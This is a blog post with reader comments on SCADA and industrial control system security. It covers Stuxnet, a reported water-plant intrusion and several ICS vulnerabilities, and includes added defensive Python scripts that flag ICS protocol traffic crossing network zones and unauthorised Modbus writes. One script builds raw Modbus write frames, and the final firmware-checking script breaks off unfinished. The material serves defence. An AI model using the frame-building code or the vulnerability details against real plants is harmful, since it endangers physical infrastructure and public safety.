SCADA systems security issues

SCADA systems are used to monitor and control critical installations in oil and gas refineries, water and power distribution plants, manufacturing plants and other industrial facilities. There has been a lot of discussion about malware and security in industrial automation systems after Stuxnet. Widely viewed as the most complex piece of computer malware ever created, Stuxnet is believed to have been designed to sabotage uranium enrichment centrifuges at Iran’s Natanz nuclear plant. If nasty malware can do that, other similar malware can do something else nasty as well.

Attacks against SCADA systems can have potentially very serious consequences. I think that we have been quite lucky that we have not seen any big disasters yet. Even though the attacks are rare at the moment, security researchers are confident that their number will increase, especially since the Stuxnet industrial sabotage worm set a successful precedent. And now there is a lot of news about the Duqu worm.

News about a month ago reported that a SCADA hack shut down a US water plant on 8 November 2011. The attack has been credited to an unknown attacker (the handle “pr0f” took credit) who, according to hacker sources, managed to access a SCADA controller and take over systems. This once again caused security experts to question the security of SCADA systems. The hacker said the Texas town used a three-character password to secure an Internet-facing SCADA system. “This was barely a hack. A child who knows how the HMI that comes with Simatic works could have accomplished this,” he wrote. “You know. Insanely stupid. I dislike, immensely, how the DHS tend to downplay how absolutely (expletive) the state of national infrastructure is. I’ve also seen various people doubt the possibility an attack like this could be done,” he wrote in a note on a file sharing Web site. On the other hand, Federal officials said there is no evidence to support a report that hackers destroyed a pump used by an Illinois-based water utility after gaining unauthorized access to the computer system it used to operate its machinery. What the truth is in this case is hard to say.

What is known is that many industrial systems are vulnerable. Siemens Simatic is a common SCADA product and has been the subject of other warnings from security researchers, according to whom Siemens industrial control systems are vulnerable to attacks that can cause serious problems. The US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) warned earlier that Siemens’ SIMATIC S7-1200 programmable logic controllers (PLCs) are vulnerable to so-called replay attacks that can interfere with normal operations. An attacker with access to the PLC or the automation network could intercept the PLC password and make unauthorized changes to the PLC operation. The ISO-TSAP protocol functions to specification; however, no authentication is performed, nor are payloads encrypted or obfuscated.

White Paper On Industrial Automation Security In Fieldbus And Field Device Level is an interesting white paper (from Vacon, Nixu and F-Secure) that focuses on presenting a generic overview of security in industrial automation. Security aspects of traditional fieldbuses, Ethernet-based networks and wireless communication technologies are presented. Challenges regarding data security in the field of industrial automation are discussed. The properties of industrial automation devices are described with a focus on security, tampering possibilities, and risk mitigation methods.

Many protocols used in industrial control systems were intentionally designed to be open and without security features. As long as the networks that run those protocols are kept physically separate from public networks, you are quite safe. For the most part, SCADA systems are not designed to be connected to the Internet, but engineers can put in workarounds for remote access. Any time you do this, you create a pathway through which someone can get in. And there are often cases where remote devices are accessed using those non-secure protocols over unsafe networks (the public telephone network, cellular networks, radio links, even the Internet).

For a long time there has been a belief that SCADA systems benefit from security through the use of specialized protocols and proprietary interfaces (security through obscurity), and that their networks are physically secured and disconnected from the Internet. Today none of those beliefs hold anymore. Nowadays you can find many tools on the Internet for working with standard SCADA protocols (for example, Wireshark can decode several commonly used SCADA protocols).

The move from proprietary technologies to more standardized and open solutions, together with the increased number of connections between SCADA systems and office networks and the Internet, has made them more vulnerable to attacks. Modern SCADA systems should be designed so that they can withstand being accidentally connected to the Internet (it will happen sooner or later). In addition to making the SCADA system itself secure, you should separate it from the Internet (no connection at all, or a very strictly configured series of firewalls). The FACT CHECK: SCADA Systems Are Online Now article says that nearly everything is connected now. Nearly all SCADA systems are online. The addition of a simple NAT device is far from bulletproof access control.

Most SCADA systems in use are old computer systems. They are usually horribly patched (“if it ain’t broken, don’t fix it”) and often run very old operating system versions. Windows is a very commonly used operating system for SCADA applications, because few SCADA packages support operating systems other than Windows. It seems that many people are not happy with the security stance taken within their organizations around SCADA hosts. Even if you have patches up to date and current anti-malware on a host, all you have done is eliminate some of the risk (and maybe created new risks, because anti-malware software can sometimes disturb normal system operation). Add a firewall and you have reduced some more of the risk. Pile on as much security as you want and people are going to find ways to disable it and make themselves vulnerable.

I wish no one had to worry about hackers in any application, but we do. Unfortunately, data security is never a non-issue.

The FACT CHECK: SCADA Systems Are Online Now article mentions an interesting story about the Boeing 747 (for those who do not know, modern 747s are big flying Unix hosts with lots of Ethernet). They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 VLANs. The security researchers managed to break out of the VLANs and access other systems (including engine management systems). The issue here is that all that separated the engine control systems and the open network was VLAN and NAT based filters.
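The points above (an ISO-TSAP/S7 session authenticates nobody, so whoever can reach TCP port 102 can act on the PLC; the control network must be kept apart from office networks and the Internet) reduce to the question of which hosts can reach which ports. The Python script below is an added example, not code from the original post: it checks constructed connection records against an assumed three-zone plant network and an assumed engineering-station allowlist, and reports each crossing of the boundaries the post says should not exist.

```python
"""Zone-based boundary check for unauthenticated ICS protocols.

ISO-TSAP (S7comm) and Modbus/TCP authenticate nobody, so the only effective
control is which hosts can reach TCP/102 or TCP/502 at all. Every connection
record is evaluated against a zone model; anything that crosses the boundary
the post says should not exist is reported. Zone ranges, host addresses and
log lines are constructed for this example.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

# Well-known ports of ICS protocols that are cleartext and unauthenticated
# in their base form.
ICS_PORTS = {
    102: "ISO-TSAP/S7comm",
    502: "Modbus/TCP",
    20000: "DNP3",
    44818: "EtherNet/IP",
}

# Constructed zone model: a three-zone plant network (assumption).
ZONES = {
    "control": ipaddress.ip_network("10.10.0.0/16"),
    "dmz": ipaddress.ip_network("10.20.0.0/24"),
    "corporate": ipaddress.ip_network("10.30.0.0/16"),
}

# Only these hosts may open the S7 programming port (constructed allowlist).
ENGINEERING_STATIONS = {ipaddress.ip_address("10.10.5.10")}


@dataclass(frozen=True)
class Conn:
    src: str
    dst: str
    dport: int


def zone_of(addr: str) -> str:
    """Map an address to its zone; anything outside the plant ranges is 'internet'."""
    ip = ipaddress.ip_address(addr)
    for name, net in ZONES.items():
        if ip in net:
            return name
    return "internet"


def parse_line(line: str) -> Conn:
    """Parse a 'src=A dst=B dport=N' record (constructed flow-log format)."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    return Conn(fields["src"], fields["dst"], int(fields["dport"]))


def evaluate(conn: Conn) -> list[str]:
    """Return the policy violations a single connection triggers (empty if none)."""
    findings = []
    szone, dzone = zone_of(conn.src), zone_of(conn.dst)
    proto = ICS_PORTS.get(conn.dport)

    # 1. ICS protocol reached from outside the control zone. Because the
    #    protocol performs no authentication, reachability equals control.
    if proto and dzone == "control" and szone != "control":
        findings.append(f"{proto} to {conn.dst} from {szone} host {conn.src}")

    # 2. S7 programming port opened by a host that is not an engineering
    #    station, even inside the control zone: this is where an intercepted
    #    PLC password would be replayed from.
    if (conn.dport == 102 and dzone == "control"
            and ipaddress.ip_address(conn.src) not in ENGINEERING_STATIONS):
        findings.append(f"ISO-TSAP from non-engineering host {conn.src}")

    # 3. A control-zone host reaching the Internet: the 'accidental
    #    connection' the post warns about.
    if szone == "control" and dzone == "internet":
        findings.append(f"control host {conn.src} reached {conn.dst}:{conn.dport}")

    return findings


def scan(lines: list[str]) -> dict[str, list[str]]:
    """Evaluate every record; return {record: findings} for violating records only."""
    report = {}
    for line in lines:
        findings = evaluate(parse_line(line))
        if findings:
            report[line] = findings
    return report


# Constructed sample records; the comments state the expected verdict.
SAMPLE_LOG = [
    "src=10.10.5.10 dst=10.10.1.20 dport=102",    # engineering station -> PLC: allowed
    "src=10.10.7.4 dst=10.10.1.20 dport=102",     # other control host -> S7 port: finding 2
    "src=10.30.2.15 dst=10.10.1.21 dport=502",    # corporate laptop -> Modbus: finding 1
    "src=203.0.113.7 dst=10.10.1.20 dport=102",   # Internet -> PLC: findings 1 and 2
    "src=10.10.1.22 dst=198.51.100.9 dport=443",  # control host calling out: finding 3
    "src=10.30.2.15 dst=10.20.0.5 dport=443",     # corporate -> DMZ historian: allowed
]

if __name__ == "__main__":
    for record, findings in scan(SAMPLE_LOG).items():
        print(record)
        for finding in findings:
            print("   ->", finding)
```

Fed with real firewall or flow logs, the same zone table doubles as the allowlist a strictly configured perimeter firewall should enforce; every finding is a rule that firewall is missing.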


  1. Tomi Engdahl says:

    Super Stuxnet’s SCADA slaves: security is atrocious
    153 computers, six SCADA systems, most C&C points to Iran

    Botnet boffin Peter Kleissner says at least 153 computers are still slaves to Stuxnet.

    Of those, six are tied to supervisory control and data acquisition (SCADA) systems which the malware is designed to exploit to destroy the attached machinery.

    Kleissner told a presentation at an information security conference in Vienna last week that half of all infections stem from Iran, where the super worm was first targeted.

    “The amount of unique identifiers basically equals to unique Stuxnet infections; it is safe to say that in 2013 and 2014 there were at least 153 distinct infected machines with Stuxnet,” Kleissner says in the paper Internet Attacks Against Nuclear Power Plants [PDF].

    “It is inevitable that existing malware infections lower the overall security of the particular machines and the entire networks and therefore make it easier (or possible at all) for anyone else to intrude the system.”

    The infected boxes appear to be isolated puppets no longer being controlled by the United States attackers, but are nonetheless exposed to hijacking by anyone in control of those servers.

    “… any capable intelligence service (or individual with the knowledge and skills) could seize control and potentially cause considerable damage leveraging the remaining infection,” Kleissner says.

  2. Tomi Engdahl says:

    Config file wipe blunder caused deadly Airbus A400M crash – claim
    Probe insiders indicate engine shutdown due to missing data

    A dodgy software installation that deleted vital files caused last month’s Airbus 400M transport plane crash in which four people died, it is claimed.

    On May 9, a test flight of the A400M, intended to replace the aging Hercules as a mainstay of NATO’s air mobility fleet, crashed in Spain, killing four of the six crew. According to Reuters today, a faulty software installation on the aircraft’s systems deleted configuration information, and caused three of the four turboprop engines to shut down after takeoff.

    People familiar with the investigation said the torque calibration parameters for the engines were wiped during the installation. This data is needed to measure and interpret information coming back from the A400M’s engines, and is crucial for the Electronic Control Units (ECU) that control the aircraft’s power systems.

    Without that sensor data, the ECU automatically shut down the engines, or at least put them into the lowest power settings. According to safety documentation, the pilots would only get a warning from the ECUs when the aircraft is 400 feet (120 metres) off the ground.

    “Nobody imagined a problem like this could happen to three engines,” a person familiar with the 12-year-old project said.

    The crashed A400M was being tested before delivery to the Turkish Air Force.

    On May 20, Airbus warned A400M customers to conduct “specific checks of the Electronic Control Units (ECU) on each of the aircraft’s engines.”

  3. Tomi Engdahl says:

    7 benefits of integrating human-machine interfaces, historians

    Cover story: Human-machine interfaces (HMIs) and historians differ but need to be tightly integrated to provide company operations with optimal value. Big data has little value without analysis and access in real time. Seven application examples explain HMI-historian integration benefits, including troubleshooting, analysis, and regulatory compliance.

    Human-machine interfaces (HMIs) and historians differ in purpose but need to be tightly integrated to provide great value to companies’ operations. HMIs provide effective control and interactions between humans and machines. Historians collect high-speed time-series data to maintain a chronology of events.


    With today’s PC standard technology and capabilities, a typical historian system should be able to store and access more than 10 years of raw data. Aggregated manufacturing big data is good for certain reports, and historians should have the features to get access to this data, but it should not be stored as aggregates. Raw data streams are needed for true analysis. A well-performing historian should be able to easily exceed 1 million updates per second when storing data while retrieving more than 3 million updates per second at the same time. Users become quickly frustrated if they cannot get access to the data they need for analysis within a few seconds.

  4. Tomi Engdahl says:

    SCADA systems can be old because “if it works don’t fix it”

    The ancient Amiga has been on for 30 years – 19 schools fully dependent on it

    If it works, do not fix it. The ancient Amiga has been responsible for the ventilation and heating of 19 American schools for 30 years, says WoodTV.

    The device has needed replacing for a long time, but so far this has not happened due to lack of money. According to Tim Hopkins, who is responsible for real estate management, spare parts are hard to find.
    Hopkins describes the device “as a unique product.”

    The computer software was written back in the day by a local high school student. If there are any problems with the software, the school asks for help from the same person, who still lives in the community.

    If the device breaks, all the schools’ systems would have to be switched on and off manually.


    1980s computer controls GRPS heat and AC

    A 30-year-old computer that has run day and night for decades is what controls the heat and air conditioning at 19 Grand Rapids Public Schools.

    The Commodore Amiga was new to GRPS in the early 1980s and it has been working tirelessly ever since. GRPS Maintenance Supervisor Tim Hopkins said that the computer was purchased with money from an energy bond in the 1980s. It replaced a computer that was “about the size of a refrigerator.”

    The computer is responsible for turning the heat and the air conditioners on and off for 19 school buildings.

    “The system controls the start/stop of boilers, the start/stop of fans, pumps, [it] monitors space temperatures, and so on,” Hopkins explained.

    Parts for the computer are difficult to find, Hopkins said. It is on its second mouse and third monitor.

    “It’s a very unique product. It operates on a 1200-bit modem,” said Hopkins. “How it runs, the software that it’s running, is unique to Commodore.”

    Hopkins said the system runs on a radio frequency that sends a signal to school buildings, which reply within a matter of seconds with the status of each building. The only problem is that the computer operates on the same frequency as some of the walkie-talkies used by the maintenance department.

    “Because they share the same frequency as our maintenance communications radios and operations maintenance radios — it depends on what we’re doing — yes, they do interfere,” Hopkins said.

    If the computer stopped working tomorrow, a staff person would have to turn each building’s climate control systems on and off by hand.

    A new, more current system would cost between $1.5 and 2 million.

  5. Tomi Engdahl says:

    MicroLogix 1400 PLC Teardown

    Introducing the MicroLogix 1400 PLC (1766L32BXBA) from Allen Bradley.

    Taking a close look at the large PCB reveals that this is where all the grunt work takes place. The hardware for this PLC was probably designed about 5-6 years ago – the date stamps for the ICs suggest their manufacture was in 2010. Onboard is an Altera Cyclone 2 FPGA and this is where I expect the user’s logic is executed. An FPGA would allow the user to include many more hardware based timers, counters and math operations than is possible with a microcontroller or microprocessor.

    Located underneath the FPGA on the other side of the PCB is 16Mbit of Flash memory. This would be where the FPGA’s bit file resides and is loaded from each time the FPGA is reset.

    Additionally there is a Freescale ColdFire MC5275 microprocessor. A quick check of this device’s datasheet reveals that it is a respectable piece of hardware. My thoughts are this is the device that performs the overall operation of the hardware, where your programming PC interfaces to when monitoring, loading new ladder logic or performing ladder logic online edits. Your new PLC code would somehow pass through this device before it is executed in the FPGA.

    The IO interface is handled with the following board. The 2x white ICs are opto-isolators manufactured by Toshiba and used for regular digital inputs.

  6. Tomi Engdahl says:

    Increasingly large numbers of unprotected automation systems

    29.06.2015 at 14:23

    The Finnish Communications Regulatory Authority’s Kyberturvallisuuskeskus is concerned about the large number of unprotected automation equipment. In its mapping of Finnish networks during spring 2015, Kyberturvallisuuskeskus still found thousands of unprotected automation devices of different types. The device types and quantities discovered in the survey correspond to those observed in previous similar studies.

    The largest group consists of building automation equipment of individual properties, of which thousands were observed in this survey as well. Automation equipment affects the physical world, which can make related security incidents particularly serious. An unprotected automation device can also be a threat to other Internet users, for example if an attacker harnesses easily compromised devices for denial of service attacks. The owner may not notice that, in addition to their own vulnerability, they are causing harm to others.


  7. Tomi Engdahl says:

    Monitor aging equipment without replacement

    Electrical gateways provide an inside view of a facility’s electrical distribution and control equipment. Older pieces of large equipment, including motor-control centers, switchgear, and panelboards, were not engineered when proactive energy management was a primary concern. See five key benefits to using electrical gateways.

    Modern gateways also use open protocols, enabling communications with devices that communicate via an open protocol like Modbus, regardless of the manufacturer—allowing for seamless integration into energy management, building management, and facility monitoring systems.

    But how do these new features translate into the actionable intelligence needed to drive continuous improvement?

    Five key benefits

    1. Safety: Monitoring systems can limit the exposure of personnel to potentially hazardous electrical environments by providing remote status and operational parameters.

    2. Reliability: Assessment of data from the monitoring system can reveal issues that could adversely affect the operation and productivity of a facility. Historical data from power monitoring systems can help locate and correct both acute and chronic problems, resulting in increased productivity. Alarm notifications also can be proactively set to warn of underperforming equipment and conditions threatening uptime.

    3. Energy efficiency: A better knowledge of how energy is used within a facility allows for identification of an array of prospects to improve efficiency, minimize waste, and reduce energy consumption. The ability to benchmark performance and export in-depth reports allows for verification of energy management program success.

    4. Simplified maintenance: Trended data and reporting capabilities allow users to better forecast when defined equipment parameters may be exceeded, allowing facility management to plan ahead instead of facing an unscheduled shutdown of equipment.

    5. Operational costs: Each benefit discussed above either directly or indirectly influences a business’ bottom line. In most cases, the monetary impact from even one or two benefits can quickly justify the purchase and installation of a power monitoring system. Monitoring systems also can be scaled from one single piece of equipment to an entire facility—allowing for incremental expansion with budget and facility growth.

  8. Tomi Engdahl says:

    Teardown: Ruggedness and flexibility keep PLCs strong in industrial

    The modern programmable logic controller (PLC) is at the nexus of two debates that are taking place daily at opposite ends of the control-system spectrum. At one end is the debate over the ideal technology for digital I/O isolation and protection. At the other end, and at a much higher architectural level, is the debate over which is better: PLC-based control or PC/embedded computer-based control.

    Given the increasing importance of factory, industrial, and manufacturing automation, we jumped on the opportunity to tear down a popular PLC, the Allen-Bradley Micro850, and explore some of the choices made in its design to shed light on core I/O isolation options along with some of the elements that go into a well-known PLC design.

    PLCs have a long and storied history, with Allen-Bradley itself coining the term “programmable logic controller” in 1971 when it introduced its version of what was then called the “programmable controller.” Allen-Bradley was since bought by Rockwell Automation. The term PLC quickly took hold,

    As anyone who cut their teeth on ladder logic can testify, PLCs at the time were an elegantly simple solution to an age-old problem: making control systems reconfigurable without having to manually rewire or reconnect the hardware.

    For industrial control and automation, these Windows-based PCs and embedded computers offered higher processing power, greater programming flexibility, more ecosystem support and lower cost.

    Meanwhile, PLCs held on to their core advantages of ruggedness, simplicity, reliability, durability and “trust,” a critical factor when downtime can result in losses ranging from thousands to many millions of dollars. Control engineers and technicians knew they could rely upon PLCs and knew how to troubleshoot or swap them out quickly and easily if anything ever did go wrong.

    While PCs may have been invading the factory floor, PLCs weren’t standing still. PCs seemed to be winning the battle in the late nineties and 2000s, but PLCs were becoming more powerful and adopting more standard operating systems and programming languages and methodologies, such as C, while also becoming more open.

  9. Tomi Engdahl says:

    Embedded automation computer with multiple connectivity ports

    Advantech’s UNO-1372G small-size DIN-rail embedded automation computer features multiple connectivity, sensor, communication, and data transfer ports and can operate in harsh conditions.

    Advantech’s UNO-1372G DIN-rail embedded automation computer features three GbE ports for fast data transfer, two mPCIe slots to enable connection to 3rd party devices, one mSATA connector, and one SATA for a SSD or HDD, two COM ports, three USB ports, eight digital I/O ports, and HDMI/VGA ports.

    The UNO-1372G has an operating temperature range of -20 C to 60 C.

    Options available include fieldbus protocols such as Profibus, Profinet, EtherCAT, and Powerlink.

    Communication options include GPS, 3G, LTE, ZigBee, RFID, and Bluetooth.

  10. Tomi Engdahl says:

    SCADA cyber security

    Securing control systems with supervisory control and data acquisition (SCADA): SCADA software, part of many industrial control systems, can use the U.S. National Institute of Standards and Technology (NIST) framework for cyber security.

    To meet cyber security concerns, software and hardware vendors, system integrators, and other stakeholders need to work with end users to achieve a secure supervisory control and data acquisition (SCADA) solution. The U.S. National Institute of Standards and Technology (NIST) offers the Cybersecurity Framework (“the Framework”) for systematically identifying the critical assets of the organization, identifying threats, and securing these critical assets. The Framework opens the door to partnerships that are more effective with cyber security prioritized so that the needs of the end user are fully met.

    Cyber financial attacks such as the 83 million household and small-business records stolen from JPMorgan Chase Bank (Reuters, 2014) contribute to the 78% increase in financial impact of cybercrime in the past four years. In this same period, 40% of cyberattacks have been directed against energy companies (Siegel, Josh; Motorola Solutions, 2014). The U.S. government is focusing on the threat to the nation’s critical infrastructure such as our electric grid, oil and gas pipelines, water and wastewater treatment facilities, and transportation infrastructure like tunnels and bridges.

  11. Tomi Engdahl says:

    Cyber security in process plants: Recognizing risks, addressing current threats

    As attacks on industrial control systems (ICSs) become more frequent and increasingly sophisticated, defensive strategies must evolve to keep up. Fortunately, the tools are getting better. See related video.

    Process industries are no place for uncertainty and risk. Companies in the oil and gas, refining, petrochemical, and power-generation industries, among others, must prevent and mitigate cyber security threats that jeopardize their production operations, including risks to plant infrastructure, assets, personnel, and the environment.

    Industrial firms need to take certain steps to protect critical facilities. Taking those steps is easier with an understanding of current and future cyber security risks, past incidents in process sectors, and knowledge of ever-changing security challenges.

    In recent years, industrial cyber security threats have grown from the esoteric practice of a few specialists to a problem of general concern. All stakeholders now have a new responsibility in promoting the safety, reliability, and stability of critical industrial infrastructure.

    Taking steps to address ICS cyber security should also improve the control system’s resilience to other adverse incidents, reducing unplanned downtime and facilitating a more rapid return to “business as usual” following an incident.

    For industrial sites, vulnerabilities to cyber threats include:

    Lack of security policies and procedures
    Communications between the Internet to the corporation
    Communications between the business LAN (local area network) and process-control network
    Insufficient or out-of-date cyber security controls, such as anti-malware software
    Obsolete or missing security patches
    Inadequate security configurations
    Incomplete or infrequent backups.

  12. Noel Martinez says:

    Very well written article with ample knowledge on SCADA security. Although SCADA systems are meant to make work easier, there are security issues there as well.

  13. Tomi Engdahl says:

    Yokogawa patches widespread SCADA vulnerability
    Networking process crashed by crafted packets

    One of the world’s major suppliers of industrial networking kit, Japanese company Yokogawa, has alerted the world to a vulnerability in 21 of its products.

    The ICS-CERT advisory, here, identifies the company’s CENTUM, ProSafe-RS, STARDOM, FAST/TOOLS and other systems as being at risk.

    The vulns are “stack-based buffer overflow vulnerabilities”, the advisory states.

    The overflows are in systems both with a Windows interface, and with embedded versions (such as the ProSafe’s human-machine interface).

    There are two denial-of-service vulnerabilities that can be triggered by a remote attacker by sending a crafted packet to “the process that executes over network communications”, cutting off communications to the targeted system.

    More seriously, the network communication process can also be crashed by a crafted packet allowing the attacker to execute arbitrary code.

  14. Tomi Engdahl says:

    Nuclear power plant bosses not too cyber-security savvy – report
    No ‘executive-level awareness’ + legacy issues = quite worrying

    The nuclear industry is ignorant of its cybersecurity shortcomings, claimed a report released today, and despite understanding the consequences of an interruption to power generation and the related issues, cyber efforts to prevent such incidents are lacking.

    Nuclear plants don’t understand their cyber vulnerability, stated the Chatham House report, which found industrial, cultural and technical challenges affecting facilities worldwide. It specifically pointed to a “lack of executive-level awareness”.

    The study was conducted over an 18-month period and involved 30 interviews with “experts from several different countries, including the US, UK, Canada, France, Germany, Japan, Ukraine and Russia.”

    Among its more frightening discoveries is that the notion “nuclear facilities are ‘air gapped’” is a “myth”, as “the commercial benefits of internet connectivity mean[s] that nuclear facilities” are increasingly networked.

    Cybersecurity problems facing the industry largely result from legacy issues. As most industrial control systems at nuclear facilities were developed in the 1960s and 1970s (“when computing was in its infancy”) cybersecurity was not a consideration in their design.

    “One example of the ‘insecure by design’ nature of industrial control systems is the lack of authentication and verification,” found the report. This obedience leaves nuclear facilities’ control systems “particularly vulnerable to man-in-the-middle attacks that alter the communication between two devices”.

    The report (PDF) details seven “known cyber security incidents at nuclear facilities” between 1992 and 2014:

    At Ignalina nuclear power plant (1992) in Lithuania, a technician intentionally introduced a virus into the industrial control system, which he claimed was “to highlight cyber security vulnerabilities”.
    The Davis-Besse nuclear power plant (2003) in Ohio was infected by the Slammer worm which disabled a safety monitoring system for almost five hours.
    The Browns Ferry nuclear power plant (2006) in Alabama experienced a malfunction of both the reactor recirculation pumps and the condensate demineraliser controller (a type of PLC).
    The Hatch nuclear power plant (2008) was shut down as an unintended consequence of a contractor’s software update.
    An unnamed Russian nuclear power plant (circa 2010) was revealed by Eugene Kaspersky to have been “badly infected by Stuxnet”.
    South Korea’s Korea Hydro and Nuclear Power Co. commercial network (2014) was breached, and information was stolen. The attack was subsequently attributed to North Korea.
    Natanz nuclear facility and Bushehr nuclear power plant (2010)

    The most well-known incident dated back to 2010, when a worm was found to be burrowing into industrial Supervisory Control And Data Acquisition (SCADA) systems on a global level.
    Dubbed Stuxnet, the worm was programmed to remain dormant unless it detected the particular hardware fingerprint of an industrial software system manufactured by Siemens.

    “The point is that risk is probability times consequence. And even though the probability might be low, the consequence of a cyber incident at a nuclear plant is extremely high.

    Cyber Security at Civil Nuclear Facilities: Understanding the Risks

  15. Tomi Engdahl says:

    Search engine can find the VPN that NUCLEAR PLANT boss DIDN’T KNOW was there – report
    No ‘exec-level awareness’, warns research

    The nuclear industry is ignorant of its cybersecurity shortcomings, claimed a report released today, and despite understanding the consequences of an interruption to power generation and the related issues, cyber efforts to prevent such incidents are lacking.

    The report adds that search engines can “readily identify critical infrastructure components with” VPNs, some of which are power plants. It also adds that facility operators are “sometimes unaware of” them.

    Nuclear plants don’t understand their cyber vulnerability, stated the Chatham House report, which found industrial, cultural and technical challenges affecting facilities worldwide. It specifically pointed to a “lack of executive-level awareness”.

    Cybersecurity problems facing the industry largely result from legacy issues. As most industrial control systems at nuclear facilities were developed in the 1960s and 1970s (“when computing was in its infancy”) cybersecurity was not a consideration in their design.

    “One example of the ‘insecure by design’ nature of industrial control systems is the lack of authentication and verification,” found the report. This obedience leaves nuclear facilities’ control systems “particularly vulnerable to man-in-the-middle attacks that alter the communication between two devices”.

Cyber Security at Civil Nuclear Facilities: Understanding the Risks
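The report's "lack of authentication and verification" is concrete in Modbus/TCP, the protocol the Modbus gateways discussed elsewhere in this thread bridge: a request frame carries a transaction id, a unit id, a function code and an address, and nothing that identifies or authenticates the sender. The following is an added example, not code from the Chatham House report or any vendor; it parses Modbus/TCP request frames and alerts on write function codes from hosts outside an engineering-station allowlist. The frames, addresses and allowlist are constructed for illustration.

```python
"""Added example: Modbus/TCP carries no authentication, so the only way to
tell a legitimate setpoint write from a hostile one is the TCP source and the
function code. This parses Modbus/TCP request frames and alerts on write
function codes from hosts outside an engineering-station allowlist.
Frames, addresses and the allowlist are constructed for illustration."""
import struct
from dataclasses import dataclass

# Function codes that change process state (writes), from the Modbus spec.
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers",
                   22: "Mask Write Register", 23: "Read/Write Multiple Registers"}
READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function: int
    address: int   # starting coil/register address
    value: int     # value written (FC5/6) or quantity (FC1-4, 15, 16)


def build_request(tid, unit, function, address, value):
    """Encode a request with a 4-byte payload (FC1-6). Note what is absent:
    no credential, no session token, no signature. MBAP = transaction id,
    protocol id 0, remaining length, unit id."""
    pdu = struct.pack(">BHH", function, address, value)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)
    return mbap + pdu


def parse_request(frame: bytes) -> ModbusRequest:
    """Decode the MBAP header and the first address/quantity pair of the PDU.
    For FC15/16 the trailing data bytes are not decoded, but the MBAP length
    check still validates the whole frame."""
    if len(frame) < 12:
        raise ValueError("frame too short for a Modbus/TCP request")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("MBAP protocol id must be 0 for Modbus")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    function, address, value = struct.unpack(">BHH", frame[7:12])
    return ModbusRequest(tid, unit, function, address, value)


def inspect(src_ip: str, frame: bytes, allowed_writers: set) -> tuple:
    """('ALERT', description) for a write from a non-allowlisted host,
    otherwise ('OK', description)."""
    req = parse_request(frame)
    name = (WRITE_FUNCTIONS.get(req.function) or READ_FUNCTIONS.get(req.function)
            or "FC%d" % req.function)
    desc = f"{src_ip} -> unit {req.unit_id}: {name} addr={req.address} value={req.value}"
    if req.function in WRITE_FUNCTIONS and src_ip not in allowed_writers:
        return "ALERT", desc
    return "OK", desc


# Constructed: the HMI is the only host that should write; 10.0.0.99 is unknown.
ALLOWED_WRITERS = {"10.0.0.5"}
SAMPLE_TRAFFIC = [
    ("10.0.0.5",  build_request(1, 1, 3, 0, 10)),   # HMI polls 10 holding registers
    ("10.0.0.5",  build_request(2, 1, 6, 7, 1)),    # HMI writes register 7 := 1
    ("10.0.0.99", build_request(3, 1, 6, 7, 0)),    # unknown host writes register 7 := 0
]


def scan(traffic=SAMPLE_TRAFFIC, allowed=ALLOWED_WRITERS):
    return [inspect(ip, frame, allowed) for ip, frame in traffic]


if __name__ == "__main__":
    for verdict, desc in scan():
        print(verdict, desc)
```

Because the protocol itself cannot refuse the third frame, the allowlist has to live somewhere that sees the TCP source, such as a firewall or a passive monitor on a SPAN port in front of the PLC or gateway; the man-in-the-middle case the report describes is exactly the one where the source address is spoofable, which is why segmentation rather than source filtering alone is the recommended control.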

  16. Tomi Engdahl says:

    Heartbleed, Other Flaws Found in Advantech ICS Gateways

    Researchers at security firm Rapid7 discovered that the latest firmware version for some Advantech EKI products is plagued by several known vulnerabilities.

    Advantech EKI are Modbus gateways designed for connecting serial devices to TCP/IP network-based devices in industrial control environments.

    The Taiwan-based industrial automation company recently released new firmware versions for EKI-136X, EKI-132X and EKI-122X products to address a security flaw related to the existence of hardcoded SSH keys (CVE-2015-6476).

    While analyzing one of the new firmware versions, Rapid7’s HD Moore discovered that it includes version 2.05 of the bash shell, which is known to be vulnerable to Shellshock attacks.

    In addition, the Advantech EKI firmware also includes version 1.0.0e of OpenSSL, which is vulnerable to Heartbleed attacks. The OpenSSL Project will end support for the 1.0.0 version starting with January 1, 2016.

    The DHCP client used by Advantech is also highly outdated and known to contain vulnerabilities, including a high-severity stack-based buffer overflow discovered in 2012.

    Beardsley has pointed out that while none of these flaws are new, the problem is that the vulnerable firmware can be found on production industrial control systems.

    Rapid7 contacted Advantech on November 11 and published a Metasploit module on December 1.

    This is the third time someone has found vulnerabilities in Advantech’s Modbus gateways. In February, the vendor patched a serious flaw that could have been exploited by remote attackers to execute arbitrary code.
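The finding above (a current firmware image shipping bash 2.05 and OpenSSL 1.0.0e) is the kind of thing a plant owner can check before the vendor does. The script below is an added example, not Rapid7's tooling or anything from Advantech: it pulls the version banners that these components embed in their binaries out of a raw firmware blob, the way `strings` would, and compares them with a minimum-version policy. The sample image and the policy table are constructed for the example; the policy numbers are not taken from any advisory and should be replaced with your own.

```python
"""Added example: triage a firmware image by pulling version banners of bundled
components out of the raw blob (the way `strings` would) and comparing them
with a minimum-version policy. The sample image and the policy are constructed
for this example; the policy numbers are not taken from any vendor advisory."""
import re
from typing import Dict, List, Tuple

# Banner formats these components actually embed in their binaries.
BANNER_PATTERNS = {
    "bash":     rb"GNU bash, version (\d+\.\d+[a-z]?)",
    "openssl":  rb"OpenSSL (\d+\.\d+\.\d+[a-z]?)",
    "dropbear": rb"SSH-2\.0-dropbear_(\d{4}\.\d+)",
}

# Constructed policy: oldest version this site accepts for each component.
# Version strings show only the base release; distribution patch levels
# (such as back-ported fixes) are invisible here, so a hit is a lead for
# manual triage, not proof of exploitability.
EXAMPLE_POLICY = {"bash": "4.3", "openssl": "1.0.1g"}

# Constructed firmware blob: binary junk around real-looking banner strings.
SAMPLE_FIRMWARE = (
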